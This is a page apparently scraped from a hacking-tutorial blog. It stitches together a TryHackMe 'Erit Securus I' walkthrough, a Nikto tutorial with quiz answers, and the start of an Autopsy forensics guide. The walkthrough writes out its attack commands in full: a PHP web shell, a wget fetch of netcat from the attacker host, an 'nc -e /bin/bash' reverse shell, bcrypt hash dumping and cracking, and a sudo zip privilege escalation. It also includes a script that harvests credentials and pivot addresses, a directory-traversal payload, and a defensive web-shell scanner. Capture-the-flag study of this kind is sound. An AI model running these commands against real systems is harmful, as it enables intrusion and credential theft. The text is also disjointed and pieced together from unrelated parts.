12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
    Enter OS command , for exit 'quit' : 
    
      





      
    Enter OS command , for exit 'quit' : echo ''>cmd.php
    ";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
    Enter OS command , for exit 'quit' : 
    
      




     

    This can then be used to upload a netcat reverse shell (as there is no netcat on the target machine). First, we will need to create a symbolic link to netcat on our local machine to the current directory on the target. Run this command via a local terminal:


    ln -s $(which nc) .

     



      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ ln -s $(which nc) .
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ ls                 
    48296.py  exploit.py  nc  session.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
    └─$ 
    
    
      



     

    A simple web server can then be started locally in order to serve the file to the target:




    [screenshot: local web server started to serve nc]





    Using the PHP shell we are able to download netcat to the target via the browser:


    http://10.10.108.118/files/cmd.php?cmd=wget http://<local-IP>:8080/nc








    The file will be transferred to the same directory as the PHP shell. We can make the uploaded netcat file executable by browsing to:


    http://10.10.108.118/files/cmd.php?cmd=chmod 755 nc









    Next, we need to start a netcat listener on our local machine:


    nc -nvlp 1234

     







     

    Finally, we can trigger this connection via the browser to get our reverse shell:



    http://10.10.108.118/files/cmd.php?cmd=./nc -e /bin/bash <local-IP> 1234



     






    Our reverse shell can then be upgraded to a fully interactive TTY shell by running:


    python -c 'import pty;pty.spawn("/bin/bash")'















      
      
    www-data@Erit:/var/www/html/public/files$ ls 
    ls
    cmd.php                       placeholder_ecff05026ae6.jpg  test25.php
    index.html                    test1.php                     test26.php
    nc                            test10.php                    test27.php
    placeholder_07f6539b3d7d.jpg  test11.php                    test28.php
    placeholder_0a23551a8097.jpg  test12.php                    test29.php
    placeholder_0aa7e8852e11.jpg  test13.php                    test3.php
    placeholder_1fad82e5eac1.jpg  test14.php                    test30.php
    placeholder_20001088e915.jpg  test15.php                    test31.php
    placeholder_46f89a97453b.jpg  test16.php                    test32.php
    placeholder_6a843969b527.jpg  test17.php                    test33.php
    placeholder_7c21b25839bd.jpg  test18.php                    test4.php
    placeholder_84f5c9d2e2c2.jpg  test19.php                    test5.php
    placeholder_8a7754ace050.jpg  test2.php                     test6.php
    placeholder_8ec2add549d6.jpg  test20.php                    test7.php
    placeholder_9cf46a03a9c3.jpg  test21.php                    test8.php
    placeholder_aa536d42187b.jpg  test22.php                    test9.php
    placeholder_addfa01cba49.jpg  test23.php
    placeholder_c45564b83b31.jpg  test24.php
    www-data@Erit:/var/www/html/public/files$ 
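The listing above is the trace a defender looks for afterwards: a hand-written cmd.php, dozens of session files renamed into a web-served upload directory, and a native binary sitting next to them. The Python scanner below is an added example, not code from the walkthrough or from Bolt; it classifies the files found in such a directory. The sample files are constructed in memory to mirror the listing; on a real host you would feed it the paths and contents read from public/files.

```python
import re

# Dangerous PHP sinks called directly on request input: the shape of cmd.php.
SHELL_SINK = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
    r"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)
# PHP session files serialise as key|value with a:N:{...} or O:N:"...";
# a .php file whose content starts that way is a renamed session file.
PHP_SESSION = re.compile(r'(?:^|\|)[aO]:\d+:')
SCRIPT_EXT = {"php", "phtml", "php5", "php7", "phar", "phps"}

# Constructed sample directory, keyed by path, mirroring the listing above.
# test5.php stands for a session file carrying an injected displayname.
SAMPLE_FILES = {
    "public/files/index.html": "<html></html>",
    "public/files/placeholder_07f6539b3d7d.jpg": "\xff\xd8\xff\xe0",
    "public/files/cmd.php": '<?php system($_GET["cmd"]);?>',
    "public/files/test5.php":
        '_sf2_attributes|a:1:{s:11:"displayname";s:30:"<?php system($_GET["test"]);?>";}',
    "public/files/test6.php": 'a:2:{s:8:"username";s:5:"admin";}',
    "public/files/nc": "\x7fELF\x02\x01\x01",
}


def classify(path, content):
    """Return the findings for one file; an empty list means nothing flagged."""
    findings = []
    name = path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in SCRIPT_EXT:
        # An upload directory should never hold server-side scripts at all.
        findings.append("server-side script in upload directory")
        if SHELL_SINK.search(content):
            findings.append("command execution on request input (web shell)")
        if PHP_SESSION.search(content):
            findings.append("PHP session data stored as a script (renamed session file)")
    if content.startswith("\x7fELF"):
        findings.append("native executable in upload directory")
    return findings


def scan(files):
    """Map each flagged path to its findings, skipping clean files."""
    result = {}
    for path, content in files.items():
        findings = classify(path, content)
        if findings:
            result[path] = findings
    return result


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_FILES).items():
        print(path, "->", "; ".join(findings))
```

The stronger control is to make the findings impossible rather than to scan for them: configure the web server not to execute scripts under the upload directory, and keep the application's cache and session directories outside anything it serves.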
    
      





    Privilege Escalation


    In the /app/database directory you will find the database file: bolt.db


    cd ../../app/database
    ls




      
    www-data@Erit:/var/www/html/public/files$ cd ../../app/database
    cd ../../app/database
    www-data@Erit:/var/www/html/app/database$ pwd
    pwd
    /var/www/html/app/database
    www-data@Erit:/var/www/html/app/database$ ls
    ls
    bolt.db
    www-data@Erit:/var/www/html/app/database$ 
     


     

     

    The type of database can be determined by running: file bolt.db





    www-data@Erit:/var/www/html/app/database$ file bolt.db
    file bolt.db
    bolt.db: SQLite 3.x database, last written using SQLite version 3020001
    www-data@Erit:/var/www/html/app/database$ 
    
    
      
      




    We can access this SQLite 3.x database and run the .tables command to display the database tables:




      www-data@Erit:/var/www/html/app/database$ sqlite3 bolt.db
    sqlite3 bolt.db
    SQLite version 3.16.2 2017-01-06 16:32:41
    Enter ".help" for usage hints.
    sqlite> 
    
    sqlite> .tables
    .tables
    bolt_authtoken          bolt_field_value        bolt_pages            
    bolt_blocks             bolt_homepage           bolt_relations        
    bolt_content_changelog  bolt_log                bolt_showcases        
    bolt_cron               bolt_log_change         bolt_taxonomy         
    bolt_entries            bolt_log_system         bolt_users            
    
      







    The bolt_users table looks interesting, let's have a look at that:

    SELECT * FROM bolt_users;



      
      
    sqlite> SELECT * FROM bolt_users;   
    SELECT * FROM bolt_users;
    1|admin|$2y$10$0Z2xl2fs/9xe2HVEkqDZZ.COwXKfHtxsyT5qdHXuJB3XgR7TzeZQi||0|a@a.com|2021-05-26 05:47:53|192.168.100.1|[]|1|||||["root","everyone"]
    2|wildone|$2y$10$ZZqbTKKlgDnCMvGD2M0SxeTS3GPSCljXWtd172lI2zj3p6bjOCGq.|Wile E Coyote|0|wild@one.com|2020-04-25 16:03:44|192.168.100.1|[]|1|||||["editor"]
    
      






    Two users are listed - admin and wildone (display name Wile E Coyote). The lastip column also records 192.168.100.1 as the last login address for both accounts, which might come in handy later.

    Both password fields start with $2y$10$, the prefix of a PHP-style bcrypt hash with cost factor 10 (2^10 rounds). John the Ripper recognises this format on its own, but bcrypt is deliberately slow to compute, so a targeted wordlist such as rockyou is the practical choice rather than a brute-force mask. We're already admin, so let's try and crack the hash of wildone using John the Ripper and the rockyou wordlist.
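    Copying hashes out of the sqlite prompt by hand is fine for two users, but a larger bolt_users table is easier to triage with a script. The following is an added example (not code from the walkthrough or from Bolt CMS) that uses Python's standard sqlite3 module to pull every account out of bolt_users, classify each hash by its crypt prefix, write a john-ready hash file and collect the last-login IPs as pivot candidates. It embeds the two rows from the transcript above as a constructed in-memory sample; the column names are assumed from the Bolt CMS 3.x users table, and the open_db() path argument is the only thing to change to point it at the real bolt.db.

```python
import json
import sqlite3

# Constructed sample: the two bolt_users rows shown in the sqlite transcript above,
# loaded into an in-memory database so this runs without the real bolt.db.
# Column names are assumed from the Bolt CMS 3.x users table (id, username, password,
# displayname, email, lastip, roles); only the columns used here are modelled.
SAMPLE_ROWS = [
    (1, "admin", "$2y$10$0Z2xl2fs/9xe2HVEkqDZZ.COwXKfHtxsyT5qdHXuJB3XgR7TzeZQi",
     "", "a@a.com", "192.168.100.1", '["root","everyone"]'),
    (2, "wildone", "$2y$10$ZZqbTKKlgDnCMvGD2M0SxeTS3GPSCljXWtd172lI2zj3p6bjOCGq.",
     "Wile E Coyote", "wild@one.com", "192.168.100.1", '["editor"]'),
]


def open_db(path=":memory:"):
    """Open a real bolt.db read-only; with the default path, build the constructed sample instead."""
    if path != ":memory:":
        return sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE bolt_users (
        id INTEGER PRIMARY KEY, username TEXT, password TEXT, displayname TEXT,
        email TEXT, lastip TEXT, roles TEXT)""")
    con.executemany("INSERT INTO bolt_users VALUES (?,?,?,?,?,?,?)", SAMPLE_ROWS)
    return con


def classify_hash(h):
    """Return (scheme, cost) from the crypt-style prefix so the right cracking mode is chosen."""
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt", int(h[4:6])       # $2y$10$ -> cost 10 = 2**10 rounds
    if h.startswith("$6$"):
        return "sha512crypt", None
    if h.startswith("$1$"):
        return "md5crypt", None
    return "unknown", None


def extract_users(con):
    """Pull every account out of bolt_users: john-ready 'user:hash' lines plus pivot-relevant metadata."""
    hash_lines, users = [], []
    rows = con.execute(
        "SELECT id, username, password, displayname, email, lastip, roles FROM bolt_users ORDER BY id")
    for uid, name, pw, display, email, lastip, roles in rows:
        scheme, cost = classify_hash(pw)
        hash_lines.append(f"{name}:{pw}")
        users.append({"id": uid, "user": name, "display": display, "email": email,
                      "scheme": scheme, "cost": cost, "lastip": lastip,
                      "roles": json.loads(roles)})
    return hash_lines, users


def pivot_addresses(users):
    """Distinct last-login IPs: candidate internal hosts to try harvested credentials or keys against."""
    return sorted({u["lastip"] for u in users if u["lastip"]})


if __name__ == "__main__":
    con = open_db()
    lines, users = extract_users(con)
    with open("hash.txt", "w") as fh:   # feed to: john --wordlist=rockyou.txt hash.txt
        fh.write("\n".join(lines) + "\n")
    for u in users:
        print(f'{u["user"]:<8} {u["scheme"]} cost={u["cost"]} roles={u["roles"]} lastip={u["lastip"]}')
    print("pivot candidates:", pivot_addresses(users))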

    First, copy the wildone hash into a file (hash.txt) and run john against it with the rockyou wordlist.

    Once the run completes, john prints the recovered password. If it is not shown (for instance because the hash was already cracked earlier and now only lives in john's pot file), list it with:

    john --show hash.txt

    The hash cracks to snickers. Quit sqlite, then change user with su wileec, entering snickers as the password. This gives us a shell as wileec and the first flag:

    .quit




      
    sqlite> .quit
    .quit
    www-data@Erit:/var/www/html/app/database$ su wileec
    su wileec
    Password: snickers    
    
    $ whoami
    whoami
    wileec
    $ ls
    ls
    bolt.db
    $ cd ~
    cd ~
    $ ls
    ls
    flag1.txt
    $ cat flag1.txt
    cat flag1.txt
    THM{Hey!_Welcome_in}
    $ 
                                                                                       
                                                                                       
                                
      




    TryHackMe Erit Securus I





    Pivoting


    It appears that wileec also has an ssh private key:

     

    ls -la
    cd .ssh




      $ ls -la
    ls -la
    total 28
    drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 .
    drwxr-xr-x 4 root   root   4096 Apr 25  2020 ..
    -rw-r--r-- 1 wileec wileec  220 May 15  2017 .bash_logout
    -rw-r--r-- 1 wileec wileec 3526 May 15  2017 .bashrc
    -rw-r--r-- 1 wileec wileec  675 May 15  2017 .profile
    drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .ssh
    -rw-r--r-- 1 root   root     21 Apr 25  2020 flag1.txt
    $ cd .ssh
    cd .ssh
    $ ls -la
    ls -la
    total 20
    drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .
    drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 ..
    -rw------- 1 wileec wileec 1675 Apr 25  2020 id_rsa
    -rw-r--r-- 1 wileec wileec  393 Apr 25  2020 id_rsa.pub
    -rw-r--r-- 1 wileec wileec  222 Apr 25  2020 known_hosts
    
    
    
      



     

    We can use this key to try an ssh connection, as wileec with the id_rsa key, to the internal IP address we found in the bolt_users table of the SQLite database, 192.168.100.1:

    Great, it worked. Note that the prompt hostname changes from Erit to Securus: we are now on a second machine, reached through the first one. Even better, we have some sudo privileges on it:

    sudo -l

     

    Privilege Escalation #2

    sudo -l shows that wileec may run /usr/bin/zip as jsmith without a password. zip's -T flag tests the archive after it is written, and -TT replaces the command used for that test, so whatever we pass to -TT runs as jsmith. zip appends the archive name to that command, which is why the payload ends in # (a shell comment). This is the well-known GTFOBins technique for zip, and it lets us elevate our privileges once again to become user jsmith:

    TF=$(mktemp -u)
    sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'



     



      $ sudo -l
    sudo -l
    Matching Defaults entries for wileec on Securus:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User wileec may run the following commands on Securus:
        (jsmith) NOPASSWD: /usr/bin/zip
    $ 
    
    $ TF=$(mktemp -u)
    TF=$(mktemp -u)
    $ sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
    sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
      adding: etc/hosts (deflated 32%)
    $ 
    
    
      



    Awesome! We are now jsmith.

    Once again, we can upgrade to a fully interactive shell:

    python -c 'import pty;pty.spawn("/bin/bash")'




      
    $ python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'
    jsmith@Securus:/home/wileec$ whoami
    whoami
    jsmith
    jsmith@Securus:/home/wileec$ cd ~
    cd ~
    jsmith@Securus:~$ ls -la
    ls -la
    total 24
    drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
    drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
    -rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
    -rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
    -rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
    -rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
    jsmith@Securus:~$ 
    
    jsmith@Securus:~$ cat flag2.txt
    cat flag2.txt
    THM{Welcome_Home_Wile_E_Coyote!}
    jsmith@Securus:~$ 
      





      jsmith@Securus:~$ sudo -l
    sudo -l
    Matching Defaults entries for jsmith on Securus:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User jsmith may run the following commands on Securus:
        (ALL : ALL) NOPASSWD: ALL
    jsmith@Securus:~$ 
    
    
    
    
      


    jsmith may run any command as any user with sudo and no password ((ALL : ALL) NOPASSWD: ALL), so we become root with sudo su and grab the third flag from /root:






    jsmith@Securus:~$ sudo su
    sudo su
    root@Securus:/home/jsmith# whoami
    whoami
    root
    root@Securus:/home/jsmith# ls -la
    ls -la
    total 24
    drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
    drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
    -rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
    -rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
    -rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
    -rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
    root@Securus:/home/jsmith# 
    
    root@Securus:/home/jsmith# cd /root
    cd /root
    root@Securus:~# ls -la
    ls -la
    total 28
    drwx------  4 root root 4096 Apr 26  2020 .
    drwxr-xr-x 22 root root 4096 Apr 17  2020 ..
    lrwxrwxrwx  1 root root    9 Apr 22  2020 .bash_history -> /dev/null
    -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
    -rw-r--r--  1 root root   43 Apr 25  2020 flag3.txt
    drwx------  2 root root 4096 Apr 23  2020 .gnupg
    -rw-r--r--  1 root root  140 Nov 19  2007 .profile
    drwx------  2 root root 4096 Apr 17  2020 .ssh
    root@Securus:~# cat flag3.txt
    cat flag3.txt
    THM{Great_work!_You_pwned_Erit_Securus_1!}
    root@Securus:~# 
    
    





    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

     

  • Knowledge about Nikto

     

     

    Knowledge about Nikto

     

     


    Introduction to Nikto


    Initially released in 2001, Nikto has made leaps and bounds over the years and has proven to be a very popular vulnerability scanner thanks to being both open source and feature-rich. Nikto can assess any type of web server (it is not application-specific like WPScan). Nikto can be used to discover possible vulnerabilities including:


    • Sensitive files
    • Outdated servers and programs (i.e. vulnerable web server installs)
    • Common server and software misconfigurations (directory indexing, CGI scripts, missing XSS protection headers)




    Installing Nikto


    Thankfully for us, Nikto comes pre-installed on the latest versions of penetration testing systems such as Kali Linux and Parrot. If you are using an older version of Kali Linux (such as 2019), Nikto is in the apt repository, so it can be installed with a simple sudo apt update && sudo apt install nikto

    Installing Nikto on other operating systems such as Ubuntu or Debian involves extra steps. Whilst the TryHackMe AttackBox comes pre-installed with Nikto, you can follow the developer's installation guide for your local environment.


     

     


    Nikto Modes

     

    Basic Scanning

    The most basic scan can be performed by using the -h flag and providing an IP address or domain name as an argument. This scan type will retrieve the headers advertised by the web server or application (e.g. Apache2, Apache Tomcat, Jenkins or JBoss) and will look for any sensitive files or directories (e.g. login.php, /admin/, etc.)

    An example of this is the following: nikto -h vulnerable_ip



     


     

     

     

    Note a few interesting things are given to us in this example:


    • Nikto has identified that the application is Apache Tomcat, using the favicon and the presence of "/examples/servlets/index.html", which is the location of the default Apache Tomcat example application.
    • The HTTP methods "PUT" and "DELETE" are allowed for clients; we may be able to leverage these to exploit the application by uploading or deleting files.


    Scanning Multiple Hosts & Ports



    Nikto is extensive in the sense that we can provide multiple arguments in a way that's similar to tools such as Nmap. In fact, we can feed the output of an Nmap scan directly into Nikto to scan a host range. By scanning a subnet, we can look for web servers across an entire network range. We must instruct Nmap to output the scan in a format Nikto can read, using Nmap's -oG (grepable output) flag.


    For example, we can scan 172.16.0.0/24 (subnet mask 255.255.255.0, 254 usable hosts) on the default web port 80 with Nmap and pipe the output into Nikto, which reads its target list from standard input when given -h -:

     

    nmap -p80 172.16.0.0/24 -oG - | nikto -h -
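    To see what Nikto is actually consuming from that pipe, here is an added example (not part of the TryHackMe room or of Nikto itself) that parses Nmap grepable output in Python: it keeps only open TCP ports and turns them into host:port lines, which is the same selection Nikto makes and is also a usable hosts file for nikto -h <file>. The scan output embedded below is constructed for the example (three invented hosts); the field layout of -oG lines (tab-separated fields, port entries of the form port/state/protocol/owner/service/rpcinfo/version/) is Nmap's real format.

```python
import re

# Constructed sample of `nmap -p80,443 172.16.0.0/24 -oG -` output: three hosts invented
# for this example. Fields are tab-separated; each port entry is
# port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_GREPABLE = (
    "# Nmap 7.92 scan initiated as: nmap -p80,443 -oG - 172.16.0.0/24\n"
    "Host: 172.16.0.1 ()\tStatus: Up\n"
    "Host: 172.16.0.1 ()\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///\n"
    "Host: 172.16.0.5 (web.lab)\tStatus: Up\n"
    "Host: 172.16.0.5 (web.lab)\tPorts: 80/closed/tcp//http///, 443/open/tcp//https///\n"
    "Host: 172.16.0.9 ()\tStatus: Up\n"
    "Host: 172.16.0.9 ()\tPorts: 80/filtered/tcp//http///, 443/filtered/tcp//https///"
    "\tIgnored State: filtered (0)\n"
    "# Nmap done -- 256 IP addresses (3 hosts up) scanned in 30.00 seconds\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_grepable(text):
    """Return (ip, hostname, port, service) for every open TCP port in nmap -oG output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # skip '# Nmap ...' comment lines
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        for field in line.split("\t"):
            if not field.startswith("Ports:"):
                continue                  # 'Status: Up' and 'Ignored State' fields carry no port data
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                if state == "open" and proto == "tcp":
                    results.append((ip, hostname, int(port), service))
    return results


def nikto_targets(text):
    """Build 'host:port' lines, one per open web port, suitable for a nikto -h hosts file."""
    return [f"{ip}:{port}" for ip, _host, port, _svc in parse_grepable(text)]


if __name__ == "__main__":
    for ip, host, port, svc in parse_grepable(SAMPLE_GREPABLE):
        print(f"{ip:<14} {host or '-':<10} {port:>5}/tcp {svc}")
    print("\n".join(nikto_targets(SAMPLE_GREPABLE)))
```

    The filtered host (172.16.0.9) and the closed ports are dropped, which matters in practice: scanning them with Nikto only wastes time and, on a filtered port, every request times out. Swap SAMPLE_GREPABLE for the contents of a real -oG file to use it on your own scans.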


    There are not many circumstances where you would use this other than when you have gained access to a network. A much more common scenario will be scanning multiple ports on one specific host. We can do this by using the -p flag and providing a list of port numbers delimited by a comma - such as the following: 

     

    nikto -h 10.10.10.1 -p 80,8000,8080







    Introduction to Plugins


    Plugins further extend the capabilities of Nikto. Using information gathered from our basic scans, we can pick and choose plugins that are appropriate to our target. You can use the --list-plugins flag with Nikto to list the plugins or view the whole list in an easier to read format online.

    Some interesting plugins include:


     

     

     

     

     

     

    • apacheusers - Attempt to enumerate Apache HTTP Authentication users
    • cgi - Look for CGI scripts that we may be able to exploit
    • robots - Analyse the robots.txt file, which dictates what files/folders we are able to navigate to
    • dir_traversal - Attempt a directory traversal attack (i.e. LFI) to look for system files such as /etc/passwd on Linux (http://ip_address/application.php?view=../../../../../../../etc/passwd)

     

     

     



    We can specify the plugin we wish to use with the -Plugin argument followed by the name of the plugin. For example, to use the "apacheusers" plugin, our Nikto scan would look like so: nikto -h 10.10.10.1 -Plugin apacheusers

     

     


     

     

     
    Verbosing our Scan


    We can increase the verbosity of our Nikto scan by providing the following arguments with the -Display flag. Unless specified, Nikto does not show its entire output, as some of it can be irrelevant (but that isn't always the case!)

     

     

     

    • 1 - Show any redirects given by the web server. Web servers may want to relocate us to a specific file or directory, so we will need to adjust our scan accordingly.
    • 2 - Show any cookies received. Applications often use cookies as a means of storing data. For example, web servers use sessions, and e-commerce sites may store the products in your basket in these cookies. Credentials can also be stored in cookies.
    • E - Output any errors. This will be useful for debugging if your scan is not returning the results that you expect!

     

     

     

     

     

    Tuning Your Scan for Vulnerability Searching


    Nikto has several categories of vulnerabilities that we can tell our scan to enumerate and test for. The following list is not exhaustive and only includes the ones that you may commonly use. We use the -Tuning flag and provide one or more of these values in our Nikto scan:

     

     

     

     

     

     

     

    • 0 - File Upload: search for anything on the web server that may permit us to upload a file. This could be used to upload a reverse shell for an application to execute.
    • 2 - Misconfigurations / Default Files: search for common files that are sensitive (and shouldn't be accessible, such as configuration files) on the web server.
    • 3 - Information Disclosure: gather information about the web server or application (i.e. version numbers, HTTP headers, or any information that may be useful to leverage in our attack later).
    • 4 - Injection: search for possible locations in which we can perform some kind of injection attack such as XSS or HTML injection.
    • 8 - Command Execution: search for anything that permits us to execute OS commands (such as to spawn a shell).
    • 9 - SQL Injection: look for applications that have URL parameters that are vulnerable to SQL injection.

     

     

     



    Saving Your Findings


    Rather than working with the output on the terminal, we can instead dump it directly into a file for further analysis, which makes our lives much easier!


    Nikto is capable of outputting to several file formats, including:


    •     Text file
    •     HTML report
    •     CSV and XML (machine-readable formats that are easy to parse or import into other tools)



    We use the -o argument (short for -output) and provide both a filename and a compatible extension. We can specify the format explicitly with -Format (-f), but Nikto is smart enough to use the extension we provide in the -o argument to choose the output format accordingly.


    For example, let's scan a web server and output this to "report.html": nikto -h http://ip_address -o report.html

     

     

     

     
     



     

     

     


    1) What argument would we use if we wanted to scan port 80 and 8080 on a host?

    Ans :- -p 80,8080



    2) What argument would we use if we wanted to see any cookies given by the web server?


    Ans :-  -Display 2



    3) What is the name & version of the web server that  Nikto has determined running on port 80?


    Ans :- Apache/2.4.7



    4) There is another web server running on another port. What is the name & version of this web server?

    Ans :- Apache-Coyote/1.1



    5) What is the name of the Cookie that this JBoss server gives?


    Ans :- JSESSIONID


     

     

     



     

     

  • Learn how to use Autopsy to investigate artifacts from a disk image

     

     




    Introduction


    What is Autopsy?


    The official description: "Autopsy is the premier open source forensics platform which is fast, easy-to-use, and capable of analyzing all types of mobile devices and digital media. Its plug-in architecture enables extensibility from community-developed or custom-built modules. Autopsy evolves to meet the needs of hundreds of thousands of professionals in law enforcement, national security, litigation support, and corporate investigation."

    Autopsy is a powerful tool. Several features within Autopsy were developed thanks to the Department of Homeland Security Science and Technology funding. You can read more about this here.

    The room's description on TryHackMe: learn how to use Autopsy to investigate artifacts from a disk image, then use that knowledge to investigate an employee who is accused of leaking private company data.



    This room's objective is to provide an overview of how to use the Autopsy tool to perform analysis on disk images and the assumption is that you are familiar with the Windows operating system and Windows artifacts in relation to forensics.




    Installation


    Installing Autopsy for Windows is pretty straightforward.


    Visit the Autopsy download page and download the Windows MSI, which corresponds to your Windows architecture, 32bit or 64bit.


    •     Run the Autopsy MSI file
    •     If Windows prompts with User Account Control, click Yes
    •     Click through the dialog boxes until you click a button that says Finish



    Autopsy is also available for Linux and macOS. Follow the install instructions provided on the Autopsy website.

    If you use Kali Linux, Autopsy is already installed.

     

     


     

     

     

    Workflow Overview


    Before diving into Autopsy and analyzing data, there are a few steps to perform, such as identifying the data source and what Autopsy actions to perform with the data source.



    Your basic workflow:


    •     Create the case for the data source you will investigate
    •     Select the data source you wish to analyze
    •     Configure the ingest modules to extract specific artifacts from the data source
    •     Review the artifacts extracted by the ingest modules
    •     Create the report



    Below is a visual of step #1.


    When you start Autopsy, there will be 3 options. To start a new case, click on New Case.








    The next screen is titled Case Information, and this is where information about the case is populated.

     

     


     

     

     






    • Case Name: The name you wish to give to the case
    • Base Directory: The root directory that will store all the files specific to the case (the full path will be displayed)
    • Case Type: Specify whether this case will be local (Single-user) or hosted on a server where multiple analysts can review it (Multi-user)



    Note: In this room, the focus is on Single-User.



    The screen that follows is titled, Optional Information and it can be left blank for our purposes. In an actual forensic environment, you should fill out this information.  When you're done, click Finish.


    In this room, you will import a case. To open an existing case, select Open Case.





     

     

